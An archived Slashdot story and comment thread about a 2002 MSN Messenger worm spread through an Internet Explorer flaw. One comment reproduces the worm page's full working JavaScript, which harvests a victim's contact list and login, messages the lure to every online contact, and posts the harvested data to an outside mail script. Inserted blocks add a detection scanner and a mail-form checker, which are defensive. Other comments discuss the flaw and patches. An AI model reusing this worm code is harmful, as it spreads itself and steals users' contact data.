Slashdot Mirror


Microsoft Instant Messenger Virus Sweeps Net

Many people have reported a Warhol virus affecting users of Microsoft Instant Messenger. If you get messaged, "Go To http://www.masenko-media.net/cool.html NoW !!!", or any similar message (apparently there are several websites with the infection code), I suggest not following the link. A brief discussion follows.

Sequence: Get messaged "Go To http://www.masenko-media.net/cool.html NoW !!!" or something similar with another URL. Follow the link. That webpage contains malicious code which gets your messenger contacts and sends a similar message to your contacts. It looks like it uses a vulnerability in formmail.pl as well, although I'm not exactly sure how (I'm not an expert in ECMAScript, sorry, and I have no systems that could possibly be affected by this to test with). I'm sure some of our readers can provide more information in the comments below.

There appear to be several webpages which carried the infected code, not just masenko-media.net. Some webmasters are already taking them down.

Sophistication: moderate. Damage: only your pride.

Solution: probably the latest mega-patch for Internet Explorer will fix the Microsoft bug that allowed this.

Risks: obviously, the code could have done worse than just messaging your contacts. With Microsoft making "messaging" an integrated part of the operating system, any flaws in it can be exploited to affect millions of people instantly, so it is a high-value target. Does it have commensurate high-strength security?

400 comments

  1. this didn't infect me.. by Anonymous Coward · · Score: 2, Funny

    because I was using the linux version of Microsoft Messenger!

    1. Re:this didn't infect me.. by erobertstad · · Score: 1

      gAIM works good for MSN and a few other IMs too, tho it lacks these wonderful features (see above story).

    2. Re:this didn't infect me.. by Anonymous Coward · · Score: 0

      >with windows you could do it with a couple of clicks.

      Unless it screws up, in which case you are screwed.

      With linux, I can fix it.

      Can you?

      No.

    3. Re:this didn't infect me.. by Anonymous Coward · · Score: 1, Funny

      Ok, so who here will write the best "your friend should update his insecure windows-system, so that you don't keep on getting this message"-version of this script? ;-)

    4. Re:this didn't infect me.. by Anonymous Coward · · Score: 0

      Ditto - but with a posher GUI (OS X). Another reason to buy a mac. As if you needed one ;)

  2. This is news? by WheelDweller · · Score: 0, Flamebait

    Isn't everything 'integrated' into Win9x prone to viruses? (Man, if we could only get these guys to write kernel code or GUI toolkits...)

    --
    --- For a good time mail uce@ftc.gov
    1. Re:This is news? by Stackis · · Score: 1
      Why the fuck does ./ even post this shit, and call it news...

      They know damn well it's going to generate nothing but flamebait from the folks posting responses...

      I guess I just don't get it...

      --

      "Look where we worship" -- Jim Morrison
    2. Re:This is news? by joshsisk · · Score: 2, Informative

      Uh, so people can download the patch before they get the virus, maybe?

    3. Re:This is news? by Anonymous Coward · · Score: 0

      What the fuck is "./" ? Maybe you could grace us with an opinion of some value, or just leave.

    4. Re:This is news? by duren686 · · Score: 1

      Bzzt, wrong.

      MSN Messenger is a downloadable on every Windows prior to XP, AFAIK (I'm not sure about 2k or ME, but I know that it isn't integrated into anything, even if it comes with the OS)

      --
      Y2K Compliant since the late 1890s
    5. Re:This is news? by phr34k · · Score: 1

      Most of the flamebait gets moderated down anyway so users can choose to ignore it.

      And anyway... Why should /. only be open to Linux users? I'm using Microsoft at work mostly because all the development software we need is released for it. Therefore most of my time is using Microsoft software.

      I'm still reading /. because it's informative, up to date and generally /not/ biased towards any OS. There's flames, but you end up with flames no matter where you go...

    6. Re:This is news? by fader · · Score: 2

      it isn't integrated into anything, even if it comes with the OS

      Bzzt yourself. Messenger is integrated with at least Outlook, and I suspect IE 6. (IE can make API calls to Messenger, regardless.) And you have apparently never used XP, where it seemingly pervades the entire system. *shudders*

      --
      - fader
    7. Re:This is news? by fjordboy · · Score: 2

      I won't do the stupid *bzzt* think..but I think you are misinformed. I have both Outlook 6 (freaking slow piece of carp) and IE 6, and I have NO MSN Messenger or Microsoft Messenger or anything. I've never really used it. *shrug* I'm running Windows 98...so that might have to do with why it isn't integrated.

    8. Re:This is news? by Mark+Pitman · · Score: 1

      Any application can "make API calls to" (I think the better term is "automate") Messenger. I have written VB apps to do it. It is similar to the way you can fire up an instance of Word or Excel from a VB app and create a document programmatically. Nothing really to do with whether it is integrated into the OS or any other application.

    9. Re:This is news? by fjordboy · · Score: 1

      erm..."thing" not "think" stupid typo.

    10. Re:This is news? by fader · · Score: 1

      *shrugs* All I know is that I'm forced to use Outlook at work, on a 2000 box. Outlook shows whether or not the sender for any emails you're viewing are online or offline if they're in your MSN contact list.

      --
      - fader
    11. Re:This is news? by vanillicat · · Score: 1

      Slashdot most certainly does have a bias. Editorial comments appear on the front page. When was the last time you saw Slashdot advocate something like windows XP? When was the last time you saw Slashdot advocate something linux based?

      Exactly.

    12. Re:This is news? by Anonymous Coward · · Score: 0

      I believe he was referring to current directory...

    13. Re:This is news? by fred911 · · Score: 1

      Time to get a new admin. 90% of all user infections are caused by Outhouse. Install another email client.

      --
      09 F9 11 02 9D 74 E3 5B - D8 41 56 C5 63 56 88 C0 45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
  3. Darn, too late by Guspaz · · Score: 0, Offtopic

    Just submitted a lengthy story about this. Oh well. On another note, have you signed the futurama petition? Fox is canceling it. http://www.petitiononline.com/futufu/petition.html PS: First comment? By me? Wow!

  4. The solution... by Anonymous Coward · · Score: 0

    Is the solution simply to not use Microsoft Messenger?

    1. Re:The solution... by iamplasma · · Score: 2, Interesting

      Yes, but guess what M$ have decided to make a compulsory add-on to windows XP. Yep, that's right, Messenger. I can just wait for the argument as to why "messenger is an essential part of windows".

    2. Re:The solution... by (startx) · · Score: 1

      It can be removed from XP. Read ntcompatible.com, then go change your registry and remove Messenger! Oh, wait, I mean laff at your friends who use windows, right.........

    3. Re:The solution... by DeathPenguin · · Score: 1, Funny

      >>Is the solution simply to not use Microsoft Messenger?

      No, but that's a good start.

    4. Re:The solution... by MoneyT · · Score: 1

      Why would you have to edit the registry just to remove a friken messaging program? Talk about a pain in the arse. Definitely makes me glad I use OS X as my primary OS, Linux as my secondary and Windows as my gaming platform (at least till I get my PS 2)

      --
      T Money
      World Domination with a plastic spoon since 1984
    5. Re:The solution... by iamplasma · · Score: 1

      That's right. I'm sad to see that you had such a low esteem of me you thought I might be running XP. :)

    6. Re:The solution... by sketerpot · · Score: 1
      And Windows users laugh at how hard it is to install things on Linux. Ha!

      To uninstall something properly, all you should have to use is a single RPM (or whatever you use) command. Typically that's all it takes. But with this crazy windows program you have to use an application that MS warns you never to use except in dire circumstances and use some poorly documented trick. Sheesh...

  5. .NET? by Anonymous Coward · · Score: 0

    Someone probably used .NET for this -

  6. Well, that's one less effectual site for vectoring by Second_Derivative · · Score: 5, Funny

    If the entire population of slashdot accessing that site to point and laugh at the exploit code and how it doesn't affect them doesn't constitute a slashdotting, I dunno what does =) I already can't access it.

    Someone post more links to the other vector pages, if we can't get them down any other way we'll bum-rush em ;)

  7. in the eye of the beholder by rakerman · · Score: 3, Funny

    With a name like Warhol, obviously this isn't a virus, it's a form of art.

    1. Re:in the eye of the beholder by Anonymous Coward · · Score: 0

      Uh... no.

      A Warhol virus is one that can infect the entire Internet in 15 minutes (of fame, get it?)

    2. Re:in the eye of the beholder by Anonymous Coward · · Score: 0

      A really gay form of art...

    3. Re:in the eye of the beholder by Anonymous Coward · · Score: 0

      hahahhhahahahhaha

    4. Re:in the eye of the beholder by Anonymous Coward · · Score: 0

      I would like to take this opportunity to formally thank the AC who took the time to enjoy my AC posting.
      Please sign my petition at
      http://www.angelfire.com/zine2/me1
      to be the next governor of cheeze

  8. Forwards are evil / Virus news by Covant · · Score: 1, Interesting

    I was waiting for one of those super annoying forwarded URLs to cause trouble, and it's finally happened.

    Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

    Do people save these bugs up and release havoc at regular intervals?

    Are there people in the inside, planting seeds?

    At least it makes for good news.

    --
    "Peace, Love and Apathy"
    1. Re:Forwards are evil / Virus news by djsable · · Score: 2, Insightful

      >> Why can't one single week go by without a big annoying MSFT bug / virus being exposed?

      The media loves that crap. They descend on it like a shark smelling blood. Any other product could have worse bugs, and they would be all Ho Hum, but a MS bug/virus? whooo boy, feeding frenzy!!

      Also, because the people who write the Virii target MS (it might just be easier too.) because of the LARGE install base of it. You can write a Linux virus, and it nails like 100 people, but you could write the same bug targeting MS products, and you can nail 100,000! You do the math. :) which is more tempting a target.

      No system is 100% secure. Period, end of story.

      MS products in general, are like swiss fricking cheese though. My big complaint is the "Turn It on By default" attitude of MS Products. I had the Messenger on my system, and after adding a couple of co-workers, never used it. I got nailed by the bug today, and was quite annoyed by it. Fortunately, the payload is non destructive, or I would have been PISSED. Leave it off by default, and IF I want it, I'll turn it on.

      badger

    2. Re:Forwards are evil / Virus news by Reikk · · Score: 0


      A week doesn't go by where there isn't a security hole in redhat or debian. The difference is slashdot has a vested interest in protecting the reputation of linux.

      Debian security holes so far this month:
      DSA-110: CUPS - buffer overflow (today)
      DSA-109: faqomatic - cross-site scripting vulnerability (today)
      DSA-108: wmtv - symlink vulnerability (Feb. 7th)

      Redhat security holes this month:
      ucd-snmp: Remote exploit, DOS (Feb. 12th)
      kernel: crash the kernel with a malformed packet (Feb. 5th)
      uucp: ability to change UIDs (Feb. 4th)


      Slashdot's FUD and bias is mildly amusing at times, but I hope nobody really takes this site seriously anymore.

    3. Re:Forwards are evil / Virus news by MoneyT · · Score: 1

      I would think (barring the massive amounts of security one would have to bypass) that if one wanted to kill a large number of computers with a virus, a *NIX virus would be the way to go.

      --
      T Money
      World Domination with a plastic spoon since 1984
    4. Re:Forwards are evil / Virus news by Anonymous Coward · · Score: 0

      Because Micro$oft hasn't yet been nuked.

      Go to UA and book a flight to Redmond, Micro$oft Oneway

      That should solve the problem >:->

    5. Re:Forwards are evil / Virus news by Anonymous Coward · · Score: 0

      ROTFLBTC

      compare the impact of these security holes with the impact of an average M$ virus.

      I know of several companies that have lost a fair amount of money because of dramatically increased phone bills when each Code Red attack would open their internet connection.

      The Debian/Redhat vulnerabilities affect your own systems and you can do something about them. What can you do about a M$ virus? Sue M$? (I hope someone did)

      So in fact FUD and bias is on your side.

    6. Re:Forwards are evil / Virus news by Anonymous Coward · · Score: 0

      > No system is 100% secure.

      But only one is 99% insecure.

  9. ToO mAnY cApS!!!11 by Anonymous Coward · · Score: 5, Funny

    iF yOuR fRiEnDs SeNd YoU mEsSaGeS fOrMaTtEd LiKe ThIs, YoU nEeD tO fInD nEw FrIeNdS!!!11

    1. Re:ToO mAnY cApS!!!11 by Anonymous Coward · · Score: 0

      asl ?

  10. Other clients? by Geeyzus · · Score: 5, Insightful

    I assume this only affects the MSN client from Microsoft... correct? Or does this also affect other clients that can use the MSN network, like Trillian? If it is just a link to some virus code on a website, it would affect Trillian (because it actually doesn't propagate through the instant messaging program)... but if it is something that gets triggered inside MSN Instant Messenger, then Trillian users are safe...

    Mark

    1. Re:Other clients? by Static_Neurotoxin · · Score: 5, Informative

      Trillian is safe. Opera is safe. The only combo you need to worry about is IE and Messenger.

      --
      --- If stupidity got us into this mess, why can it get us out?
    2. Re:Other clients? by Qwerpafw · · Score: 2, Informative

      Fire (like trillian, but for OS X) doesn't seem to care. At least, as far as I can tell. Most likely the security hole lies in windows/MSN integration. or in the MSN client software. But not the messaging protocol.

      Of course, the trillian people have a MUCH better track record in terms of patches and so forth (they keep updating so it'll work with AOL...) so even if it affects trillian (pretty sure the answer is NO...) they will fix it before M$.

    3. Re:Other clients? by Anonymous Coward · · Score: 0

      Actually, Trillian will work without a web browser, (98lite) while MSN messenger requires IE 4...
      So visiting a malicious web-page shouldn't affect it, as it's not really "integrated" like IE/MSN-messenger.

    4. Re:Other clients? by jaavaaguru · · Score: 2

      EveryBuddy and Gaim are two alternative messaging clients that have access to the MSN chat system. I used to use Everybuddy but I prefer Gaim's interface now. Both are fully "skinnable" (using GTK themes) like Trillian is. There are plenty of alternatives to Microsoft's offering. MS's software would appear to make extensive use of scripting like most of their other products do, which does more bad than good with worms/viruses such as this one on the rounds. Gaim supports Perl scripting, but it's easy to disable it, and its default state is disabled. I understand that most internet chat users probably don't realise that their software has this scripting ability. Maybe something needs done to make them aware of it and what it can (potentially) do. Then we might see less stories about people falling victim to these attacks. (hey!, stop laughing and saying they deserve it! that's not fair...)

    5. Re:Other clients? by ahde · · Score: 2

      It affects trillian too -- but only your MSN contacts. And you have to use IE when you click on the link.

    6. Re:Other clients? by Anonymous Coward · · Score: 0

      I got hit by this, and was using trillian at the time, however, what happened, even though I had MSN closed down, it launched the MSN client, then propagated itself. Harmless, annoying yes.

    7. Re:Other clients? by Psx29 · · Score: 1

      The more M$ products you use the worse off you are basically ;P

    8. Re:Other clients? by Anonymous Coward · · Score: 0

      Hah! I'm glad that I've recently switched to both Trillian and Opera.

    9. Re:Other clients? by matrix29 · · Score: 1

      The more Microsoft products you use the worse off you are basically.

      This is timeless wisdom perfect for a line of T-Shirts.

      --
      "Face it, a nation that maintains a 72% approval rating on George W. Bush is a nation with a very loose grip on reality.
  11. Anyone surprised? by Qwerpafw · · Score: 2, Insightful

    I for one, am not shocked at all :)

    Anyone who is shocked is a bit of a fool. It was only a matter of time, really, until one of M$'s many security holes in messenger was exploited. Kinda sad to think what will happen in the future as OS becomes more and more integrated with the internet. Your personal data (courtesy of passport) might be spread around if you replied to a IM, or data loss.

    Don't use microsoft products, so I am not vulnerable. Happy me.

    1. Re:Anyone surprised? by Anonymous Coward · · Score: 0

      There is no hole in MSN Messenger. It's a hole in IE that was patched weeks ago. Learn to read, it'll take you far.

  12. Looks like they want in on the aim monopoly by Anonymous Coward · · Score: 0

    First they want interoperability. Now aim has security exploits, so they have to have them too. Damn microsoft is childish.

  13. what's the url? by MathJMendl · · Score: 4, Funny

    What's the url for this virus? The link to "Go To http://www.masenko-media.net/cool.html NoW" wasn't clickable. Please fix this, /. admin!

    --


    "I have not failed. I've simply found 10,000 ways that won't work." --Thomas Edison
    1. Re:what's the url? by Schmerd · · Score: 0, Redundant

      Are you serious? A URL is an address, not necessarily something you can click on. /. left off the HREF on purpose so that people wouldn't blindly click and get burned by the malicious code.

    2. Re:what's the url? by Anonymous Coward · · Score: 0
      Are you serious?
      Never. :-)
    3. Re:what's the url? by Anonymous Coward · · Score: 0

      im gonna guess that it was a joke. calm yourself.

    4. Re:what's the url? by Covant · · Score: 3, Funny

      I think your sarcasm font is broken...

      That reminds me, I wish MSN had tone markup's..
      they've got enough of those dumb smiley faces.

      --
      "Peace, Love and Apathy"
    5. Re:what's the url? by iamplasma · · Score: 1

      I wouldn't put it past some people.

    6. Re:what's the url? by MathJMendl · · Score: 2

      Seeing as to how three separate people didn't see my invisible sarcasm tags, of course I'm not serious, lol. Thought it was obviously a joke. :-)

      --


      "I have not failed. I've simply found 10,000 ways that won't work." --Thomas Edison
    7. Re:what's the url? by jimlintott · · Score: 1

      Don't worry. It was obvious.

  14. The Code by nihilist_1137 · · Score: 5, Informative

    Use Trillian: http://www.trillian.cc. A few people msg me with the link. All that happens is that a blank window pops up. Mind you, I am on dual monitors so that may have had something to do with it. The code for the page (http://www.masenko-media.net/cool.html ) is:
    <br><br>
    <html>
    <head>
    <title>Welcome</title>
    <Script>

    var msnWin;
    var msnList;
    var msgStr = "Go To http://www.masenko-media.net/cool.html NoW !!!";

    function Go(){

    msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
    msnWin.resizeTo(1, 1);
    msnWin.moveTo(10000, 10000);
    msnWin.document.title = "Please Wait...";
    msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C54 1" id="msnObj2"></object>';
    focus();

    if (msnWin.msnObj1.localState == 1){
    msnWin.msnObj2.autoLogon();
    }
    Contacts();
    Send();
    msnWin.close();
    document.contents.submit();
    }

    function Contacts(){
    msnList = msnWin.msnObj1.list(0);
    document.contents.email.value = msnWin.msnObj1.localLogonName;
    document.contents.subject.value = Date();
    var msnStr = "<br>";

    for (i=0;i<msnList.count;i++){
    if (msnList(i).state >1){
    msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }

    else{
    msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "<br>";
    }
    }
    document.contents.contentBox.value = msnStr;
    }

    function Send(){
    for (i=0;i<msnList.count; i++){
    if (msnList(i).state >1){
    msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
    }
    }
    }

    </Script>
    </head>
    <body onload="Go()">
    <p align="center">&nbsp;
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center">&nbsp;</p>
    <p align="center"><font face="Arial">
    Please Wait...</font></p>
    <form METHOD="POST" ACTION="http://www.yong.f2s.com/mailform.pl" NAME="contents" ID="Form1">
    <input type="hidden" name="redirect" value="http://www.rjdesigns.co.uk/cool/go.htm" ID="Hidden1">
    <input type="hidden" name="recipient" value="mmargae@wanadoo.nl" ID="Hidden5">
    <input type="hidden" name="email">
    <input type="hidden" name="subject">
    <input type="hidden" NAME="contentBox" id="Hidden6">
    <input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
    </form>
    </body>
    </html>
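
A static check for the indicators visible in the page source posted above, as an added example that is not part of the thread or of anyone's posted code. The names `scanPage` and `verdict`, the pixel thresholds and the `.invalid` hosts in the constructed samples are assumptions made for this example.

```javascript
"use strict";

// CLSIDs copied exactly as they appear in the page source posted above.
// The forum copy carries a stray space in each; whitespace is stripped before comparing.
const normClsid = (s) => s.replace(/\s+/g, "").toUpperCase();
const WATCHED_CLSIDS = [
  "F3A614DC-ABE0-11d2-A441-00C04F79568 3",
  "FB7199AB-79BF-11d2-8D94-0000F875C54 1",
].map(normClsid);

// Thresholds are assumptions chosen for this example.
const TINY_PX = 10;        // window resized to at most this many pixels per side
const OFFSCREEN_PX = 5000; // window moved at least this far from the origin

function scanPage(html, pageUrl) {
  const findings = [];
  const add = (id, detail) => findings.push({ id, detail });

  // 1. <object classid="clsid:..."> naming a watched control (also inside script strings).
  const objRe = /<object\b[^>]*?\bclassid\s*=\s*(["'])\s*clsid:([^"']*)\1/gi;
  for (const m of html.matchAll(objRe)) {
    const clsid = normClsid(m[2]);
    if (WATCHED_CLSIDS.includes(clsid)) add("activex-messenger-object", clsid);
  }

  // 2. Script opens a window on a local scheme (res: or about:), the zone confusion
  //    described elsewhere in the thread.
  const openRe = /\b(?:document|window)\.open\s*\(\s*["'](res|about):/gi;
  for (const m of html.matchAll(openRe)) add("local-zone-window", m[1].toLowerCase() + ":");

  // 3. Window hidden by shrinking it and moving it far off screen.
  const resize = /\.resizeTo\s*\(\s*(\d+)\s*,\s*(\d+)\s*\)/.exec(html);
  const move = /\.moveTo\s*\(\s*(-?\d+)\s*,\s*(-?\d+)\s*\)/.exec(html);
  const tiny = resize && Number(resize[1]) <= TINY_PX && Number(resize[2]) <= TINY_PX;
  const far = move && (Math.abs(Number(move[1])) >= OFFSCREEN_PX ||
                       Math.abs(Number(move[2])) >= OFFSCREEN_PX);
  if (tiny && far) {
    add("hidden-window", `resizeTo(${resize[1]},${resize[2]}) moveTo(${move[1]},${move[2]})`);
  }

  // 4. Script-driven Messenger calls that appear in the posted page.
  const calls = [...new Set([...html.matchAll(/\.(sendText|autoLogon)\s*\(/g)].map((m) => m[1]))];
  if (calls.length) add("messenger-api-call", calls.sort().join(","));

  // 5. Form submitted by script to another host, with the mail recipient set by the form.
  const pageHost = new URL(pageUrl).hostname;
  const scripted = /\.submit\s*\(\s*\)/.test(html);
  const formRe = /<form\b[^>]*?\baction\s*=\s*(["'])(.*?)\1[^>]*>([\s\S]*?)<\/form>/gi;
  for (const m of html.matchAll(formRe)) {
    let host;
    try { host = new URL(m[2], pageUrl).hostname; } catch { continue; }
    const hasRecipient = /<input\b[^>]*\bname\s*=\s*["']?recipient\b/i.test(m[3]);
    if (host !== pageHost && hasRecipient && scripted) add("scripted-offsite-mail-form", host);
  }
  return findings;
}

// "block" when a watched control is loaded into a local-scheme window, "review" on
// any other finding, "clean" otherwise.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  if (ids.has("activex-messenger-object") && ids.has("local-zone-window")) return "block";
  return ids.size ? "review" : "clean";
}

// Constructed sample modelled on the posted page; hosts are placeholders under .invalid.
const SAMPLE_URL = "http://www.example.invalid/cool.html";
const SAMPLE = `<html><head><script>
var w = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
w.resizeTo(1, 1);
w.moveTo(10000, 10000);
w.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F79568 3" id="msnObj1"></object>';
function Send(l){ for (var i = 0; i < l.count; i++) l(i).sendText("hdr", "msg", 0); }
function Go(){ document.contents.submit(); }
</script></head><body onload="Go()">
<form METHOD="POST" ACTION="http://mail.example.invalid/mailform.pl" NAME="contents">
<input type="hidden" name="recipient" value="collector@example.invalid">
<input type="hidden" name="contentBox">
</form></body></html>`;

// Constructed benign page: ordinary popup and a same-site contact form.
const BENIGN = `<html><body>
<script>function help(){ window.open("https://www.example.invalid/help.html"); }</script>
<form method="post" action="/contact"><input name="email"><input type="submit"></form>
</body></html>`;

console.log(verdict(scanPage(SAMPLE, SAMPLE_URL)), verdict(scanPage(BENIGN, SAMPLE_URL)));
```

The check works on raw text rather than a parsed DOM because the `<object>` tags in the posted page live inside a script string assigned to `innerHTML`, where an HTML parser would not see them.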

    1. Re:The Code by suwain_2 · · Score: 2, Informative
      $ wget http://www.masenko-media.net/cool.html
      --19:08:55-- http://www.masenko-media.net/cool.html
      => `cool.html'
      Connecting to www.masenko-media.net:80... connected!
      HTTP request sent, awaiting response... 404 Not Found
      19:08:55 ERROR 404: Not Found.

      Seems they took it down? Now is this just going to have millions of people getting 404 messages?

      --
      ________________________________________________
      suwain_2 :: quality slashdot p
    2. Re:The Code by einhverfr · · Score: 4, Insightful

      So this sends the links to your contacts in IM and takes your passport email address and sends it to the http://www.yong.f2s.com/mailform.pl (or something similar).

      Damage: not just your pride-- being bombarded with lots of spam? (I guess that is TBD)

      --

      LedgerSMB: Open source Accounting/ERP
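
The form in the posted page carries its own `recipient` and `redirect` values to a mail script on another host. The checks a form-to-mail handler can apply to refuse such a submission, as an added example that is not part of the thread and not the code of any real formmail script; the allowlists, the function names and the `.invalid` hosts are assumptions.

```javascript
"use strict";

// Assumed site policy for this example; neither list comes from the thread.
const ALLOWED_RECIPIENTS = new Set(["webmaster@shop.example.invalid"]);
const ALLOWED_HOSTS = new Set(["shop.example.invalid"]);
// Form fields (names as in the posted form) that end up in mail headers.
const HEADER_FIELDS = ["email", "subject"];

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch { return ""; }
}

function checkSubmission(fields, refererHeader) {
  const reasons = [];

  // The recipient must be one the site owner configured, never whatever the form names.
  const rcpt = String(fields.recipient || "").trim().toLowerCase();
  if (!ALLOWED_RECIPIENTS.has(rcpt)) reasons.push("recipient-not-allowlisted");

  // The form should have been served by one of our own pages. Referer is client
  // supplied, so this stops other sites' pages in a browser, not a scripted client.
  if (!ALLOWED_HOSTS.has(hostOf(refererHeader))) reasons.push("referer-not-allowlisted");

  // A redirect target, when present, must stay on our own hosts.
  if (fields.redirect !== undefined && !ALLOWED_HOSTS.has(hostOf(fields.redirect))) {
    reasons.push("redirect-not-allowlisted");
  }

  // Values copied into mail headers must not contain CR or LF.
  for (const name of HEADER_FIELDS) {
    if (/[\r\n]/.test(String(fields[name] || ""))) reasons.push("crlf-in-" + name);
  }
  return { accept: reasons.length === 0, reasons };
}

// Constructed submission shaped like the posted form (placeholder hosts and addresses).
const OFFSITE = {
  recipient: "collector@example.invalid",
  redirect: "http://landing.example.invalid/go.htm",
  email: "victim@example.invalid",
  subject: "Thu Feb 14 2002",
  contentBox: "<br>Online Contact: ...",
};
const OFFSITE_REFERER = "http://www.example.invalid/cool.html";

// Constructed legitimate submission from the site's own contact page.
const OWN = {
  recipient: "webmaster@shop.example.invalid",
  redirect: "http://shop.example.invalid/thanks.html",
  email: "customer@example.invalid",
  subject: "Order question",
};
const OWN_REFERER = "http://shop.example.invalid/contact.html";

console.log(checkSubmission(OFFSITE, OFFSITE_REFERER), checkSubmission(OWN, OWN_REFERER));
```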
    3. Re:The Code by Intel86 · · Score: 1

      It does not send your Passport address, but it does send somebody's (possibly the referrer?). My code is slightly different, but it's not my e-mail address that gets sent.

    4. Re:The Code by meanman · · Score: 2, Interesting

      > msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
      > msnWin.resizeTo(1, 1);
      > msnWin.moveTo(10000, 10000);
      > msnWin.document.title = "Please Wait...";

      This is a particularly annoying tactic that some popup ads use, where you create a new full screen window (only works in IE) then resize it and move it. The result is a window that has no border at all, and the malicious ad can then display a 'windows like' dialog image that can easily fool your average windows user into clicking.

    5. Re:The Code by einhverfr · · Score: 2

      re-read the code-- the email address in the code is not yours. However, the jscript takes your msn logon (i.e. email address) and adds that to the form before submitting it!

      --

      LedgerSMB: Open source Accounting/ERP
    6. Re:The Code by c0wh · · Score: 2, Informative

      To nitpick a bit, this tactic is actually used to hide the window in all respects but its entry in the taskbar. (it's resized to one pixel tall and wide, and moved way off the lower right corner, unless your screen resolution is above 10,000 x 10,000.)

      Popups like this usually avoid being noticed, so they can launch normal pop up ads at thirty second intervals if they so choose.

      I can't stand this crap. Mozilla has gone in a great direction by disabling any "window.open" calls except from user generated events. (no more popups "onLoad" or "onUnload," if you enable that feature)

    7. Re:The Code by inKubus · · Score: 3, Insightful

      It's funny. Most of the code for Windows looks like this. Windows is basically one big script. Everything it does, practically, is scripted. They were relying on the fact that most of the scripting is undocumented, but a simple browse to \windows\web and opening *.htt with notepad should show you how much of a problem this is. Even something as fundamental as file browsing is scripted. There will always be a way to exploit windows.

      --
      Cool! Amazing Toys.
    8. Re:The Code by Graspee_Leemoor · · Score: 2

      "Windows is basically one big script. Everything it does, practically, is scripted....There will always be a way to exploit windows"

      As opposed to linux where there is not a script in sight?

      Actually the Windows scripts differ from linux ones in that they control some pretty fundamental things in the OS, like the html behind file-manager windows. Linux scripts are, I suppose, only run at certain specific times, like ppp-up or system shutdown.

      Of course, either system is open to the abuse of replacing standard scripts with malicious ones, it's just that under linux most people are not using their root account for day-to-day work, while under Windows nearly everyone's Administrator.

      blah blah, this is because a) Users know no better , b) Because Windows has this different mindset there are a whole bunch of things you have to be Administrator to do, so it is harder for security-conscious users to separate the user from the super-user.

      graspee

  15. Does this affect Trillian? by Anonymous Coward · · Score: 0

    I use Trillian to connect to MS-IM. Can I be infected?
    I also use Opera and I'm not daft enough to run downloaded software until I double check with the sender. I assume I'm safe, but I would like to know (so I can act all smug about using Trillian and Opera ;))

  16. Well, they' by z00r · · Score: 0, Flamebait

    Contrary to the Orwellian theme, it's clear that in the computer world, ignorance (which causes people to use Windows software) is a major liability.

  17. could be a lot worse, likely will be soon by immanis · · Score: 5, Interesting

    I wrote a simple script about a year ago that exported a user's MSN registry key and sent it to me. Given that MSN logins, Passport Logins and Hotmail logins all could be gleaned from that key... well you get the idea.

    It worked too. Got to log into MSN as the CTO of our company, just to make a point.

    As long as scripters can manage things like this, and as long as it is _that_ easy to pull a person's login data from the registry, Passport will _never_ be secure.

    1. Re:could be a lot worse, likely will be soon by PaperTie · · Score: 1

      Wouldn't that only work if you choose to store your login info for next time? If that's the case, then it's the more the fault of lazy users than Microsoft.

    2. Re:could be a lot worse, likely will be soon by Ooblek · · Score: 0, Troll
      Yeah, its too bad someone made such a thing as scripting languages. They are all ultra evil agents of Microsoft. Which scripting language do we abolish first? Perl? [c|ba|k]sh? ECMA? VBScript?

      Maybe if scripting languages are abolished, all the laid off techies that actually have real skills will have an easier time finding work.

      Do scripting languages prove or disprove the statement, "People are basically good?"

    3. Re:could be a lot worse, likely will be soon by Anonymous Coward · · Score: 0

      Ignoring your troll, I'll take a minute to respond to your comment:

      It's not the scripting languages themselves that are insecure: it's the lack of security browser-side. Internet Explorer does basically NO checking of the script, so if the scripting language has the ability to do something (like read/write the registry), then IE will allow it.
      It's a design flaw from MS, not the language designers.

      For all we know, Konqueror/Galleon/whatever have the same problems. Possible? Yes. Critical? Not really, since you'd need root access to read/write vital files.

    4. Re:could be a lot worse, likely will be soon by Tony-A · · Score: 2

      Or if Microsoft decides to store it anyway.
      If it's stored as a temporary prior to making it permanent.
      What little security there is is more the fault of lazy crackers.

      FUD. Fear Uncertainty Doubt. Where does your data want to go today?

  18. Not a Messenger flaw by Osty · · Score: 5, Informative

    First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions. As the post noted, it is fixed with the latest IE patch. The actual problem was with IE's document.open scripting object, and how it was able to access local system objects from web sites (basically, the about: URI namespace was considered to be in the "My Computer" security domain, which means it had much more lax security than an actual website. However, since about: can take valid html, site developers were able to embed Messenger objects in about: pages, and access information from that). This is not a problem with Messenger at all.


    Install the patch and be done with it.

    1. Re:Not a Messenger flaw by RWarrior(fobw) · · Score: 5, Insightful

      "Install the patch and be done with it."

      Is that why I keep getting probed with NIMDA? Because people just install the patch and are done with it?

      --
      Remove the caps and hold to a mirror.
    2. Re:Not a Messenger flaw by Tackhead · · Score: 3, Insightful
      > First off, this is not a virus. It's an Internet Explorer exploit allowing access to your Messenger contact list and other Messenger functions.

      And while we're at it, this isn't a Warhol worm either.

      I don't see the optimized scanning routine for initial propagation. I don't see a precompiled target list or any innovative ways to scan the network. And if you wanted to do maximum damage, you'd release it on a Friday night before this weekend.

      Unless the spam from the formmail.pl script contains a very clever exploit to set the stage for a second round of infection, I'm calling this one a false alarm. It's an annoyance, but not a Warhol worm by any stretch of the imagination.

    3. Re:Not a Messenger flaw by Anonymous Coward · · Score: 0

      And what about all the idiots that install Linux and leave every server on in its unpatched state and then instantly become DDoS client machines when they hook up to the net? Is that Linux's fault? No one on here would think so, but the same exact scenario IS Microsoft's fault? Well either it is or it's not, but Linux has the same damn problem!

